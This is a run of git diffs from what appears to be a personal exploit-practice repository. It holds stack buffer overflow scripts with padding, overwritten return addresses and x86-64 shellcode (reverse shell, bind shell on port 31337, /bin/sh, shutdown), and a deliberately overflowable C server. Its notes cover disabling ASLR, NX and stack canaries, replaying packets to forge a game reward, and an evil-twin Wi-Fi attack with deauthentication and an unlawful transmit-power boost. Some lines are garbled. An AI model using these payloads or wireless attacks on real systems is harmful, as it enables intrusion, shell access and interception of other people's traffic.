willitscale · March 5, 2022 07:23 · Feb 22, 2019 · Feb 22, 2019 · Feb 22, 2019 · Feb 22, 2019
diff --git a/BUFFER_OVERFLOW_SETUP.MD b/BUFFER_OVERFLOW_SETUP.MD
@@ -103,7 +103,7 @@ $ gdb stack
 (gdb) si
 ```
 
-#### Run the code with the alphabet
+#### Run the code with the exploit
 ```
 (gdb) r < exploit
 ```

diff --git a/BUFFER_OVERFLOW_SETUP.MD b/BUFFER_OVERFLOW_SETUP.MD
@@ -105,7 +105,7 @@ $ gdb stack
 
 #### Run the code with the alphabet
 ```
-(gdb) r < alphabet
+(gdb) r < exploit
 ```
 
 #### Step into what should be a segmentation fault

diff --git a/BUFFER_OVERFLOW_SETUP.MD b/BUFFER_OVERFLOW_SETUP.MD
@@ -2,6 +2,7 @@
 
 #### Considerations when executing a Buffer Overflow
 
+##### Disable Execution Protection (not needed for Ubuntu18)
 ```
 Linux NX
 [    0.000000] NX (Execute Disable) protection: active
@@ -18,35 +19,37 @@ When DEP/NX is turned off you should see something similar to this output:
 
 # dmesg | grep NX
 [    0.000000] NX (Execute Disable) protection: disabled by kernel command line option
+```
+
+##### ASLR
 
+```
 Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
 
-Buffer overflow protection is any of various techniques used during software development to enhance the security of executable programs by detecting buffer overflows on stack-allocated variables, and preventing them from causing program misbehavior or from becoming serious security vulnerabilities. A stack buffer overflow occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, which could lead to program crashes, incorrect operation, or security issues.
 
-https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries
+# disable in current session
+echo 0 | tee /proc/sys/kernel/randomize_va_space
+
+# make change permanent (across reboots)
+echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
 ```
 
-#### Things that can counter
+##### Buffer Overflow Protection
 
 ```
-Global Offset Table (GOT)
-Procedure Linkage Table (PLT)
-```
+Buffer overflow protection is any of various techniques used during software development to enhance the security of executable programs by detecting buffer overflows on stack-allocated variables, and preventing them from causing program misbehavior or from becoming serious security vulnerabilities. A stack buffer overflow occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, which could lead to program crashes, incorrect operation, or security issues.
 
-#### Start with
+https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries
 
-```
-docker build . -t exploits
-docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
+# Compile with -fno-stack-protector -z execstack
+gcc stack.c -fno-stack-protector -z execstack -o stack
 ```
 
-#### 
-```
-# disable in current session
-echo 0 | tee /proc/sys/kernel/randomize_va_space
+#### Considerations
 
-# make change permanent (across reboots)
-echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
+```
+Global Offset Table (GOT) - Stores a map of the global variables
+Procedure Linkage Table (PLT) - Stores a map for the ASLR
 ```
 
 #### GDB Documentation:

diff --git a/server_exploit.py b/server_exploit.py
@@ -1,4 +1,4 @@
-import struct
+Things that can counterimport struct
 # python2 exploit.py|nc localhost 8080
 
 # This is for a 64 bit architecture

diff --git a/server_exploit.py b/server_exploit.py
@@ -32,4 +32,7 @@
 # Reverse Shell http://shell-storm.org/shellcode/files/shellcode-871.php
 # payload = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\xc7\x44\x24\xfc\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x04\x3b\x0f\x05"
 
+# TCP bind sh 31337
+payload = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x4d\x31\xd2\x41\x52\x41\x52 \xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\ x48\x31\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x 0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
+
 print padding + eip + nopslide + payload
diff --git a/Server.java b/Server.java
@@ -21,7 +21,10 @@ private void listen() throws Exception {
         BufferedReader in = new BufferedReader(
                 new InputStreamReader(client.getInputStream()));        
         while ( (data = in.readLine()) != null ) {
-            System.out.println("\r\nMessage from " + clientAddress + ": " + data);
+	    if (0 == "receive-potion".compareTo(data)) {
+                System.out.println("Add item to user account");
+	    }
+            System.out.println("\r\nMessage from " + clientAddress);
         }
 
 	listen();
@@ -41,4 +44,4 @@ public static void main(String[] args) throws Exception {
 
         app.listen();
     }
-}
+}
diff --git a/Client.java b/Client.java
@@ -27,7 +27,7 @@ private void start() throws IOException {
 	    System.out.println("Excellent! Here is your reward! Press 1 to continue");
 
 	    if (0 == scanner.nextLine().compareTo("1")) {
-		out.println("recieve-potion");
+		out.println("receive-potion");
 		out.flush();
 	    }
 

diff --git a/PACKET_REPLAY.MD b/PACKET_REPLAY.MD
@@ -8,7 +8,16 @@ tcpdump -n -c 1 -s 0 dst host 127.0.0.1 and port 44655 -w event.pcap -i lo
 tcpdump -r event.pcap -X
 ```
 
-### Replay the packet
+### Replay the packet (after sequence modification)
 ```
 tcpreplay --intf1=lo event.pcap 
+```
+
+### Alternatively use wireplay
+https://code.google.com/archive/p/wireplay/ - Original
+https://github.com/abhisek/wireplay - Updated
+
+### Simplied with netcat
+```
+nc 127.0.0.1 44655 < receive-potion
 ```
diff --git a/PROCESS.MD → BUFFER_OVERFLOW_SETUP.MD b/PROCESS.MD → BUFFER_OVERFLOW_SETUP.MD
diff --git a/explot.py → stack_exploit.py b/explot.py → stack_exploit.py
diff --git a/server_exploit.py b/server_exploit.py
@@ -8,7 +8,7 @@
 padding = "\x00"*88
 
 # Point the instruction pointer after the LEAVE instruction
-eip = struct.pack("Q", 0x7fffffffde50)
+eip = struct.pack("Q", 0x7fffffffe440)
 
 # NOP slide to correct the runtime variable variance
 # nopslide = "\x90" * 100

diff --git a/Client.java b/Client.java
@@ -0,0 +1,45 @@
+import java.io.IOException;
+import java.io.PrintWriter;
+import java.net.InetAddress;
+import java.net.Socket;
+import java.util.Scanner;
+
+public class Client {
+    private Socket socket;
+    private Scanner scanner;
+    private Client(InetAddress serverAddress, int serverPort) throws Exception {
+        this.socket = new Socket(serverAddress, serverPort);
+        this.scanner = new Scanner(System.in);
+    }
+    private void start() throws IOException {
+        String input;
+	    System.out.println("Provide me with the herbs I need to make you a “special” potionPress 1 to continue");
+
+	    PrintWriter out = new PrintWriter(this.socket.getOutputStream(), true);
+
+	    if (0 == scanner.nextLine().compareTo("1")) {
+                out.println("make-potion");
+                out.flush();
+	    } else {
+		System.out.println("Come back when you have the herbs");
+	    }
+
+	    System.out.println("Excellent! Here is your reward! Press 1 to continue");
+
+	    if (0 == scanner.nextLine().compareTo("1")) {
+		out.println("recieve-potion");
+		out.flush();
+	    }
+
+	    start();
+    }
+
+    public static void main(String[] args) throws Exception {
+        Client client = new Client(
+                InetAddress.getByName(args[0]), 
+                Integer.parseInt(args[1]));
+
+        System.out.println("\r\nConnected to Server: " + client.socket.getInetAddress());
+        client.start();                
+    }
+}
diff --git a/MyClientSocket.java b/MyClientSocket.java
@@ -1,32 +0,0 @@
-package com.pgx.java.socket;
-import java.io.IOException;
-import java.io.PrintWriter;
-import java.net.InetAddress;
-import java.net.Socket;
-import java.util.Scanner;
-public class MyClientSocket {
-    private Socket socket;
-    private Scanner scanner;
-    private MyClientSocket(InetAddress serverAddress, int serverPort) throws Exception {
-        this.socket = new Socket(serverAddress, serverPort);
-        this.scanner = new Scanner(System.in);
-    }
-    private void start() throws IOException {
-        String input;
-        while (true) {
-            input = scanner.nextLine();
-            PrintWriter out = new PrintWriter(this.socket.getOutputStream(), true);
-            out.println(input);
-            out.flush();
-        }
-    }
-
-    public static void main(String[] args) throws Exception {
-        MyClientSocket client = new MyClientSocket(
-                InetAddress.getByName(args[0]), 
-                Integer.parseInt(args[1]));
-
-        System.out.println("\r\nConnected to Server: " + client.socket.getInetAddress());
-        client.start();                
-    }
-}

diff --git a/PACKET_REPLAY.MD b/PACKET_REPLAY.MD
@@ -0,0 +1,14 @@
+### Dump the packet
+```
+tcpdump -n -c 1 -s 0 dst host 127.0.0.1 and port 44655 -w event.pcap -i lo
+```
+
+### Verify the packet
+```
+tcpdump -r event.pcap -X
+```
+
+### Replay the packet
+```
+tcpreplay --intf1=lo event.pcap 
+```
diff --git a/MyServerSocket.java → Server.java b/MyServerSocket.java → Server.java
@@ -1,12 +1,12 @@
-package com.pgx.java.socket;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
 import java.net.InetAddress;
 import java.net.ServerSocket;
 import java.net.Socket;
-public class MyServerSocket {
+
+public class Server {
     private ServerSocket server;
-    public MyServerSocket(String ipAddress) throws Exception {
+    public Server(String ipAddress) throws Exception {
         if (ipAddress != null && !ipAddress.isEmpty()) 
           this.server = new ServerSocket(0, 1, InetAddress.getByName(ipAddress));
         else 
@@ -23,6 +23,8 @@ private void listen() throws Exception {
         while ( (data = in.readLine()) != null ) {
             System.out.println("\r\nMessage from " + clientAddress + ": " + data);
         }
+
+	listen();
     }
     public InetAddress getSocketAddress() {
         return this.server.getInetAddress();
@@ -32,11 +34,11 @@ public int getPort() {
         return this.server.getLocalPort();
     }
     public static void main(String[] args) throws Exception {
-        MyServerSocket app = new MyServerSocket(args[0]);
+        Server app = new Server(args[0]);
         System.out.println("\r\nRunning Server: " + 
                 "Host=" + app.getSocketAddress().getHostAddress() + 
                 " Port=" + app.getPort());
 
         app.listen();
     }
-}
+}
diff --git a/EVIL_TWIN.MD b/EVIL_TWIN.MD
@@ -0,0 +1,35 @@
+### List all available wifi devices
+```
+iwconfig
+```
+
+### Start one as a monitor
+```
+airmon-ng start <WIFI>
+```
+
+### Monitor the network traffic
+```
+airodump-ng <WIFI>
+```
+
+### Create the evil twin 
+```
+airbase-ng -a 26:18:1D:64:00:DD --essid "StealingYourInfo" -c 1 mon0
+```
+
+### Deauth the target
+```
+aireplay-ng --deauth 0 -a <TARGET_MAC>
+```
+
+### Need some extra power? (CAREFUL ABOUT LEGALITIES!)
+```
+iw reg set BO
+iwconfig wlan0 txpower 30
+```
+
+### Set channel
+```
+iwconfig <WIFI> channel 1
+```
diff --git a/Dockerfile b/Dockerfile
@@ -1,6 +0,0 @@
-FROM python:2
-RUN apt update
-RUN apt install -y gdb
-RUN echo 0 > tee /proc/sys/kernel/randomize_va_space
-COPY ./exploits /exploits
-WORKDIR /exploits

diff --git a/MyClientSocket.java b/MyClientSocket.java
@@ -0,0 +1,32 @@
+package com.pgx.java.socket;
+import java.io.IOException;
+import java.io.PrintWriter;
+import java.net.InetAddress;
+import java.net.Socket;
+import java.util.Scanner;
+public class MyClientSocket {
+    private Socket socket;
+    private Scanner scanner;
+    private MyClientSocket(InetAddress serverAddress, int serverPort) throws Exception {
+        this.socket = new Socket(serverAddress, serverPort);
+        this.scanner = new Scanner(System.in);
+    }
+    private void start() throws IOException {
+        String input;
+        while (true) {
+            input = scanner.nextLine();
+            PrintWriter out = new PrintWriter(this.socket.getOutputStream(), true);
+            out.println(input);
+            out.flush();
+        }
+    }
+
+    public static void main(String[] args) throws Exception {
+        MyClientSocket client = new MyClientSocket(
+                InetAddress.getByName(args[0]), 
+                Integer.parseInt(args[1]));
+
+        System.out.println("\r\nConnected to Server: " + client.socket.getInetAddress());
+        client.start();                
+    }
+}
diff --git a/MyServerSocket.java b/MyServerSocket.java
@@ -0,0 +1,42 @@
+package com.pgx.java.socket;
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+import java.net.InetAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+public class MyServerSocket {
+    private ServerSocket server;
+    public MyServerSocket(String ipAddress) throws Exception {
+        if (ipAddress != null && !ipAddress.isEmpty()) 
+          this.server = new ServerSocket(0, 1, InetAddress.getByName(ipAddress));
+        else 
+          this.server = new ServerSocket(0, 1, InetAddress.getLocalHost());
+    }
+    private void listen() throws Exception {
+        String data = null;
+        Socket client = this.server.accept();
+        String clientAddress = client.getInetAddress().getHostAddress();
+        System.out.println("\r\nNew connection from " + clientAddress);
+
+        BufferedReader in = new BufferedReader(
+                new InputStreamReader(client.getInputStream()));        
+        while ( (data = in.readLine()) != null ) {
+            System.out.println("\r\nMessage from " + clientAddress + ": " + data);
+        }
+    }
+    public InetAddress getSocketAddress() {
+        return this.server.getInetAddress();
+    }
+
+    public int getPort() {
+        return this.server.getLocalPort();
+    }
+    public static void main(String[] args) throws Exception {
+        MyServerSocket app = new MyServerSocket(args[0]);
+        System.out.println("\r\nRunning Server: " + 
+                "Host=" + app.getSocketAddress().getHostAddress() + 
+                " Port=" + app.getPort());
+
+        app.listen();
+    }
+}
diff --git a/server_exploit.py b/server_exploit.py
@@ -1,4 +1,5 @@
 import struct
+# python2 exploit.py|nc localhost 8080
 
 # This is for a 64 bit architecture
 

diff --git a/server.c b/server.c
@@ -0,0 +1,74 @@
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+
+#define MAX 80
+#define MAX_BUFFER 1024
+#define PORT 8080
+#define SA struct sockaddr
+
+// Function designed for chat between client and server.
+void func(int sockfd)
+{
+    char buff[MAX];
+    bzero(buff, MAX);
+    read(sockfd, buff, MAX_BUFFER);
+    return;
+}
+
+// Driver function
+int main()
+{
+    int sockfd, connfd, len;
+    struct sockaddr_in servaddr, cli;
+
+    // socket create and verification
+    sockfd = socket(AF_INET, SOCK_STREAM, 0);
+    if (sockfd == -1) {
+        printf("socket creation failed...\n");
+        exit(0);
+    }
+    else
+        printf("Socket successfully created..\n");
+    bzero(&servaddr, sizeof(servaddr));
+
+    // assign IP, PORT
+    servaddr.sin_family = AF_INET;
+    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
+    servaddr.sin_port = htons(PORT);
+
+    // Binding newly created socket to given IP and verification
+    if ((bind(sockfd, (SA*)&servaddr, sizeof(servaddr))) != 0) {
+        printf("socket bind failed...\n");
+        exit(0);
+    }
+    else
+        printf("Socket successfully binded..\n");
+
+    // Now server is ready to listen and verification
+    if ((listen(sockfd, 5)) != 0) {
+        printf("Listen failed...\n");
+        exit(0);
+    }
+    else
+        printf("Server listening..\n");
+    len = sizeof(cli);
+
+    // Accept the data packet from client and verification
+    connfd = accept(sockfd, (SA*)&cli, &len);
+    if (connfd < 0) {
+        printf("server acccept failed...\n");
+        exit(0);
+    }
+    else
+        printf("server acccept the client...\n");
+
+    // Function for chatting between client and server
+    func(connfd);
+
+    // After chatting close the socket
+    close(sockfd);
+}
diff --git a/server_exploit.py b/server_exploit.py
@@ -0,0 +1,34 @@
+import struct
+
+# This is for a 64 bit architecture
+
+# 64 bytes for the character array plus 1 byte for the LEAVE
+# instruction this should take us to the RETURN instruction
+padding = "\x00"*88
+
+# Point the instruction pointer after the LEAVE instruction
+eip = struct.pack("Q", 0x7fffffffde50)
+
+# NOP slide to correct the runtime variable variance
+# nopslide = "\x90" * 100
+nopslide = ""
+
+# Trip the code into the intel CPU debugger (also known as int3),
+# prevents a segmentation fault from halting the application
+# to verify we have successfully caused a buffer overflow without
+# crashing the application
+payload = "\xCC" * 8
+
+# /bin/sh http://shell-storm.org/shellcode/files/shellcode-806.php
+# payload = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+
+# shutdown -h http://shell-storm.org/shellcode/files/shellcode-877.php
+# payload = "\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
+
+# Bind shell with netcat http://shell-storm.org/shellcode/files/shellcode-822.php
+# payload = "\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+
+# Reverse Shell http://shell-storm.org/shellcode/files/shellcode-871.php
+# payload = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x48\x97\xc7\x44\x24\xfc\xc0\xa8\x01\x09\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x6a\x2a\x58\x48\x89\xe6\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x89\xc7\x99\x88\x44\x24\xff\x48\x83\xec\x01\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10\x0f\x05\x48\xb8\x64\x6f\x6f\x6d\x65\x64\x72\x61\x57\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x5f\x48\x31\xc0\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x04\x3b\x0f\x05"
+
+print padding + eip + nopslide + payload
diff --git a/PROCESS.MD b/PROCESS.MD
@@ -6,6 +6,19 @@
 Linux NX
 [    0.000000] NX (Execute Disable) protection: active
 
+Boot and interrupt the GRUB menu
+Edit the boot configuration, changing the "linux" line by adding these two parameters to the end of the line:
+    noexec=off noexec32=off
+Then boot by pressing Ctrl+x.
+
+After booting, you can check to see if DEP/NX is turned off by running:
+    dmesg | grep NX
+
+When DEP/NX is turned off you should see something similar to this output:
+
+# dmesg | grep NX
+[    0.000000] NX (Execute Disable) protection: disabled by kernel command line option
+
 Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
 
 Buffer overflow protection is any of various techniques used during software development to enhance the security of executable programs by detecting buffer overflows on stack-allocated variables, and preventing them from causing program misbehavior or from becoming serious security vulnerabilities. A stack buffer overflow occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, which could lead to program crashes, incorrect operation, or security issues.
@@ -43,7 +56,7 @@ echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
 
 #### Build binary
 ```
-$ gcc application.c -fno-stack-protector -z execstack -o stack
+$ gcc stack.c -fno-stack-protector -z execstack -o stack
 ```
 
 #### Run GDB

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -3,6 +3,9 @@
 #### Considerations when executing a Buffer Overflow
 
 ```
+Linux NX
+[    0.000000] NX (Execute Disable) protection: active
+
 Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
 
 Buffer overflow protection is any of various techniques used during software development to enhance the security of executable programs by detecting buffer overflows on stack-allocated variables, and preventing them from causing program misbehavior or from becoming serious security vulnerabilities. A stack buffer overflow occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, which could lead to program crashes, incorrect operation, or security issues.

diff --git a/explot.py b/explot.py
@@ -1,19 +1,28 @@
 import struct
-
-# This is for a 64 bit architecture
-
-# 64 bytes for the character string plus 8 bytes for the LEAVE (or ENTER) instruction
-# this should take us to the RETURN instruction
-padding = "\x01"*72
-
-# Point the EIP at the stack
-eip = struct.pack("Q", 0x7fffffffde00)
-
-# Trip the code into a CPU debugger (also known as int3),
-# prevents a segmentation fault from halting the application
-payload = "\xCC"*8
-
-# NOP slide
-# payload = "\x90"*100+"\xCC"
-
-print padding + eip + payload
+
+ # This is for a 64 bit architecture
+
+ # 64 bytes for the character array plus 1 byte for the LEAVE
+ # instruction this should take us to the RETURN instruction
+ padding = "\x00"*72
+
+ # Point the instruction pointer after the LEAVE instruction
+ eip = struct.pack("Q", 0x00007fffffffdc20)
+
+ # NOP slide to correct the runtime variable variance
+ # nopslide = "\x90" * 100
+ nopslide = ""
+
+ # Trip the code into the intel CPU debugger (also known as int3),
+ # prevents a segmentation fault from halting the application
+ # to verify we have successfully caused a buffer overflow without
+ # crashing the application
+ payload = "\xCC" * 8
+
+ # /bin/sh
+ # payload = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+
+ # shutdown -h
+ # payload = "\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
+
+ print padding + eip + nopslide + payload
diff --git a/PROCESS.MD b/PROCESS.MD
@@ -6,6 +6,8 @@
 Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
 
 Buffer overflow protection is any of various techniques used during software development to enhance the security of executable programs by detecting buffer overflows on stack-allocated variables, and preventing them from causing program misbehavior or from becoming serious security vulnerabilities. A stack buffer overflow occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, which could lead to program crashes, incorrect operation, or security issues.
+
+https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries
 ```
 
 #### Things that can counter
@@ -22,6 +24,15 @@ docker build . -t exploits
 docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
 ```
 
+#### 
+```
+# disable in current session
+echo 0 | tee /proc/sys/kernel/randomize_va_space
+
+# make change permanent (across reboots)
+echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
+```
+
 #### GDB Documentation:
 
 * https://sourceware.org/gdb/onlinedocs/gdb/

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -1,10 +1,11 @@
 # PROCESS
 
-#### Start with
+#### Considerations when executing a Buffer Overflow
 
 ```
-docker build . -t exploits
-docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
+Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.
+
+Buffer overflow protection is any of various techniques used during software development to enhance the security of executable programs by detecting buffer overflows on stack-allocated variables, and preventing them from causing program misbehavior or from becoming serious security vulnerabilities. A stack buffer overflow occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer. Stack buffer overflow bugs are caused when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer. This almost always results in corruption of adjacent data on the stack, which could lead to program crashes, incorrect operation, or security issues.
 ```
 
 #### Things that can counter
@@ -14,6 +15,13 @@ Global Offset Table (GOT)
 Procedure Linkage Table (PLT)
 ```
 
+#### Start with
+
+```
+docker build . -t exploits
+docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
+```
+
 #### GDB Documentation:
 
 * https://sourceware.org/gdb/onlinedocs/gdb/

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -5,7 +5,13 @@
 ```
 docker build . -t exploits
 docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
+```
+
+#### Things that can counter
 
+```
+Global Offset Table (GOT)
+Procedure Linkage Table (PLT)
 ```
 
 #### GDB Documentation:

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -15,7 +15,7 @@ docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /
 
 #### Build binary
 ```
-$ gcc application.c -fno-stack-protector -o stack
+$ gcc application.c -fno-stack-protector -z execstack -o stack
 ```
 
 #### Run GDB

diff --git a/Dockerfile b/Dockerfile
@@ -1,6 +1,6 @@
 FROM python:2
 RUN apt update
 RUN apt install -y gdb
-RUN echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
+RUN echo 0 > tee /proc/sys/kernel/randomize_va_space
 COPY ./exploits /exploits
 WORKDIR /exploits
diff --git a/Dockerfile b/Dockerfile
@@ -1,5 +1,6 @@
 FROM python:2
 RUN apt update
 RUN apt install -y gdb
+RUN echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 COPY ./exploits /exploits
 WORKDIR /exploits
diff --git a/PROCESS.MD b/PROCESS.MD
@@ -5,6 +5,7 @@
 ```
 docker build . -t exploits
 docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
+
 ```
 
 #### GDB Documentation:

diff --git a/Dockerfile b/Dockerfile
@@ -0,0 +1,5 @@
+FROM python:2
+RUN apt update
+RUN apt install -y gdb
+COPY ./exploits /exploits
+WORKDIR /exploits
diff --git a/PROCESS.MD b/PROCESS.MD
@@ -1,13 +1,20 @@
 # PROCESS
 
+#### Start with
+
+```
+docker build . -t exploits
+docker run -it --cap-add=SYS_PTRACE --security-opt seccomp=unconfined exploits /bin/bash
+```
+
 #### GDB Documentation:
 
 * https://sourceware.org/gdb/onlinedocs/gdb/
 * http://visualgdb.com/gdbreference/commands/x
 
 #### Build binary
 ```
-$ gcc stack.c -fno-stack-protector -o stack
+$ gcc application.c -fno-stack-protector -o stack
 ```
 
 #### Run GDB

diff --git a/explot.py b/explot.py
@@ -13,4 +13,7 @@
 # prevents a segmentation fault from halting the application
 payload = "\xCC"*8
 
+# NOP slide
+# payload = "\x90"*100+"\xCC"
+
 print padding + eip + payload
diff --git a/stack.c b/stack.c
@@ -1,7 +1,4 @@
-#include <stdlib.h>
-#include <unistd.h>
 #include <stdio.h>
-#include <string.h>
 
 int main() {
     char buffer[64];

diff --git a/PROCESS.MD b/PROCESS.MD
@@ -1,35 +1,35 @@
 # PROCESS
 
-### GDB Documentation:
+#### GDB Documentation:
 
 * https://sourceware.org/gdb/onlinedocs/gdb/
 * http://visualgdb.com/gdbreference/commands/x
 
-### Build binary
+#### Build binary
 ```
 $ gcc stack.c -fno-stack-protector -o stack
 ```
 
-### Run GDB
+#### Run GDB
 ```
 $ gdb stack
 ```
 
-### Disassemble the main function to find the ret(32)/retq(64 aka return quad) instruction
